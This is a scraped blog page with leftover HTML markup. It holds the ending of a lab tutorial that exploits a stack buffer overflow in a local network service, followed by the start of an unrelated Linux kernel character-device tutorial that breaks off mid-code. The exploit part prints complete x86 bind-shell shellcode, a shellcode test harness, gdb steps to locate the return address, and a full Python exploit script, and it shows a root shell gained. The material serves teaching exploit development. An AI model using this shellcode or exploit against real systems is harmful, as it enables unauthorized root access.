/spanld -o bindshell bindshell.o/span span class="code-line"span class="gp"testuser@dev:~$ /spanobjdump -d ./bindshellspan class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"span class="gp"testuser@dev:~$ /spancat shellcode.c/span span class="code-line"span class="gp"#/spanincludelt;stdio.hgt;/span span class="code-line"span class="gp"#/spanincludelt;string.hgt;/span span class="code-line"/span span class="code-line"span class="go"unsigned char code[] = \/span/span span class="code-line"span class="go"quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;;/span/span span class="code-line"/span span class="code-line"span class="go"main()/span/span span class="code-line"span class="go"{/span/span span class="code-line"/span span class="code-line"span class="go" printf(quot;Shellcode Length: %d\nquot;, strlen(code));/span/span span class="code-line"/span span class="code-line"span class="go" int (*ret)() = (int(*)())code;/span/span span class="code-line"/span span class="code-line"span class="go" ret();/span/span span class="code-line"/span span class="code-line"span class="go"}/span/span span class="code-line"span class="gp"testuser@dev:~$ /spangcc -z execstack -fno-stack-protector -o shellcode shellcode.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 119/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"testuser/span/span span class="code-line"/code/pre/div /td/tr/table pSo our shellcode works, lastly we need to figure out where our shellcode will land, one thing you will need to know is that when you start an application using codegdb/code, the memory layout of the stack is slightly different to when its started on its own (we saw this in part 2 where we kept having to adjust our attack inside and outside of codegdb/code)./p pOur shellcode is going to be stored on the stack so we need to start the application outside of codegdb/code and attach to it in another root terminal so we get the right position that our shellcode will be at:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"19269 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"22791 pts/1 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"root@dev:~# /spangdb -q -p span class="m"19269/span/span span class="code-line"span class="go"Attaching to process 19269/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb7fe1424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbffff390: 0xbfff000a 0xbffff3b4 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbffff3a0: 0xbffff7a0 0xbffff79c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbffff3b0: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbffff3c0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbffff3d0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table pSo our shellcode will start at code0xbffff3b4/code (its the second column on the row starting code0xbffff3b0/code, each column is 4 bytes long so code0xbffff3b0/code + 4 = code0xbffff3b4/code), this is the address that we need to overwrite EIP with./p pNow we have the length of our shellcode (119), the address we start overwriting on the stack and the number of bytes until we overwrite EIP, we can write our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"402/span span class="c1"# (528 - 119) - 7 = 402/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"7/span span class="c1"# another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xb4\xf3\xff\xbf/spanspan class="s2"quot;/span span class="c1"# the address of our shellcode/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pFinally we can test the exploit against our application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-exploit.py/span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"ls/span/span span class="code-line"span class="go"app-net/span/span span class="code-line"span class="go"secret.txt/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"cat secret.txt/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!!! :-D/p h2Conclusion/h2 pI hope this has highlighted the differences between attacking local and remote applications. Different situations will always arise where you need to tweak the method you use to attack the application its best to be able to adapt to as many situations as possible./p pIt is a little more difficult to develop exploits for a remote applications and might not work when run against the actual target because of differences between the development environment and the actual target environment which is why its very important to try to replicate the target environment as much as possible./p pHappy Hacking :–)/p

eXploit
A Simple Character Device0xe7
6 June 2014 at 13:55

A Simple Character Device

eXploit

By: 0xe7

6 June 2014 at 13:55

pThis is the second post on a href="https://en.wikipedia.org/wiki/Linux" target="_blank"Linux/a a href="https://en.wikipedia.org/wiki/Kernel_%28computing%29" target="_blank"kernel/a hacking. In the a href="/linux-kernel-hacking/2014/05/10/first-lkm/"first post/a we created a basic Linux a href="https://en.wikipedia.org/wiki/Loadable_kernel_module" target="_blank"kernel module/a, but this LKM didn't really do anything except write a message to the system log on load/unload./p pNow we will extend this to create a device which we can use to communicate with the LKM, other than a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system calls/a, a href="https://en.wikipedia.org/wiki/Device_file" target="_blank"device files/a are how a href="https://en.wikipedia.org/wiki/User_space" target="_blank"userland/a applications communicate with code running in a href="https://en.wikipedia.org/wiki/User_space#Kernel_space" target="_blank"kernelland/a./p !-- more -- h2What Is A Device File/h2 pThere are 2 main types of device files, a a href="https://en.wikipedia.org/wiki/Device_file#Character_devices" target="_blank"character device/a file and a a href="https://en.wikipedia.org/wiki/Device_file#Block_devices" target="_blank"block device/a file. The differences are, a block device is buffered (meaning it doesn't offer direct access to the device and ultimately means that you don't know how long it will take before a write is pushed to the actual device) and a block device allows reads or writes of any size, character device reads and writes are aligned to block boundaries./p pWe will be using a character device because they are simpler to understand (as we will use the device file in exactly the same way that we would use a regular file), we have no need for random access to the device and it provides direct access to the device./p pWhen viewed using codels -l/code a character device will have codec/code as the first letter, while a block device has a codeb/code./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanls -l /dev/console/span span class="code-line"span class="go"crw------- 1 root root 5, 1 May 29 12:07 /dev/console/span/span span class="code-line"span class="gp"root@dev:~# /spanstat /dev/console/span span class="code-line"span class="go" File: `/dev/console#39;/span/span span class="code-line"span class="go" Size: 0 Blocks: 0 IO Block: 4096 character special file/span/span span class="code-line"span class="go"Device: 5h/5d Inode: 1466 Links: 1 Device type: 5,1/span/span span class="code-line"span class="go"Access: (0600/crw-------) Uid: ( 0/ root) Gid: ( 0/ root)/span/span span class="code-line"span class="go"Access: 2014-05-29 12:06:54.303999993 +0100/span/span span class="code-line"span class="go"Modify: 2014-05-29 12:07:28.303999993 +0100/span/span span class="code-line"span class="go"Change: 2014-05-29 12:06:54.303999993 +0100/span/span span class="code-line"span class="go" Birth: -/span/span span class="code-line"/code/pre/div /td/tr/table pFirst on line 1 I use codels/code to view some of the attributes of the file, as you can see on line 2 it is a character device. On line 3 I use the codestat/code command to view further statistics, here, on line 6, it tells you the major and minor numbers (5 and 1 respectively, these numbers are also shown in the output of codels/code after the group ownership), a href="https://en.wikipedia.org/wiki/Inode" target="_blank"inode/a number and a href="https://en.wikipedia.org/wiki/Block_%28data_storage%29" target="_blank"block/a size (on line 5)./p pThis means that if you delete the file with coderm /dev/console/code, you can create the file again using codemknod /dev/console c 5 1/code (codec/code is for character device). I will demonstrate this later with our custom character device./p pThe major and minor numbers uniquely identify a device. The major number defines which driver is going to be called to perform the input/output operation. The minor number is implementation defined, basically its up to the driver what the minor number means, it is just passed as an argument./p h2Building Our Character Device/h2 pFor our character device we will implement a basic device which will take a string as an input (when the device file is written to), reverse the words of the string (any string of characters without a space is considered a word here) and output the reversed string when the device file is read from./p pIn Linux there is a generic character device called codemisc/code implemented in the kernel, this is the device we will use to create our character device./p pThe advantage here is that the codemisc/code device deals with the initialisation and cleanup of the device so we can just concentrate on the functionality of it. The major number of the codemisc/code device is 10, we can confirm this later once we have created ours and is codedrivers/char/misc.c/code in the kernel source./p pEvery device requires a file_operations a href="https://en.wikipedia.org/wiki/Struct_%28C_programming_language%29" target="_blank"struct/a, this defines what functions are run when certain actions are performed on the devices file, it is defined in codeincludes/linux/fs.h/code (so we will need to include this header file) as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"file_operations/spanspan class="w" /spanspan class="n"__fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"owner/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"THIS_MODULE/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"open/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"__fops/spanspan class="w" /spanspan class="err"##/spanspan class="w" /spanspan class="n"_open/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"release/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_release/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"read/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_read/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"write/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_write/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"llseek/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"generic_file_llseek/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pYou don't need to use all of these, only the ones that you will require based on what you want to do with your device. We only want to do something particular when we read from or write to the device file so our file_operations struct will be like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/spanspan class="w" /spanspan class="nc"file_operations/spanspan class="w" /spanspan class="n"reverse_fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"read/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_read/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"write/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_write/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAll of the functions will contain the name codereverse/code which is what our character device will be called due to the nature of what it does, although the actual names are irrelevant./p pHere we are telling the kernel that when a read happens on our device file we want to run the function codereverse_read/code (on line 2) and when a write happens we want to run the function codereverse_write/code (on line 3)./p pWe will use this struct inside our codemiscdevice/code struct. The codemiscdevice/code struct is defined in codeinclude/linux/miscdevice.h/code (so we will also need to include this header file) as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/spanspan class="w" /spanspan class="nc"miscdevice/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"minor/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"name/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"file_operations/spanspan class="w" /spanspan class="o"*/spanspan class="n"fops/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"list_head/spanspan class="w" /spanspan class="n"list/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"device/spanspan class="w" /spanspan class="o"*/spanspan class="n"parent/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"device/spanspan class="w" /spanspan class="o"*/spanspan class="n"this_device/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"nodename/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"umode_t/spanspan class="w" /spanspan class="n"mode/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAgain, here we only need codeminor/code, codename/code and codefops/code. So ours will be defined as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"miscdevice/spanspan class="w" /spanspan class="n"reverse_misc_device/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"minor/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"MISC_DYNAMIC_MINOR/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"name/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;reversequot;/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"reverse_fops/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pIn the codeinclude/linux/miscdevice.h/code header, the a href="http://www.cprogrammingexpert.com/C/Tutorial/fundamentals/symbolic_constant_c_programming_language.aspx" target="_blank"symbolic constant/a codeMISC_DYNAMIC_MINOR/code is defined as code255/code, this means it will pick the next avaliable minor number./p pNow we should ensure our device is registered and unregistered when our LKM is loaded and unloaded respectively. The codeinclude/linux/miscdevice.h/code header also includes the declaration of 2 functions that will help us here, codemisc_register/code and codemisc_deregister/code, and they are decleared as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"extern/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"misc_register/spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"miscdevice/spanspan class="w" /spanspan class="o"*/spanspan class="w" /spanspan class="n"misc/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="k"extern/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"misc_deregister/spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"miscdevice/spanspan class="w" /spanspan class="o"*/spanspan class="n"misc/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSo they both take 1 argument, the miscdevice struct created earlier. Other than this our LKM doesn't need to do anything else, so the initialization and exit functions can be written like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="nf"reverse_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_register/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="nf"reverse_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_deregister/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNext we need to develop the functionality, for this I wrote a normal a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a application to make sure it was all working:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span 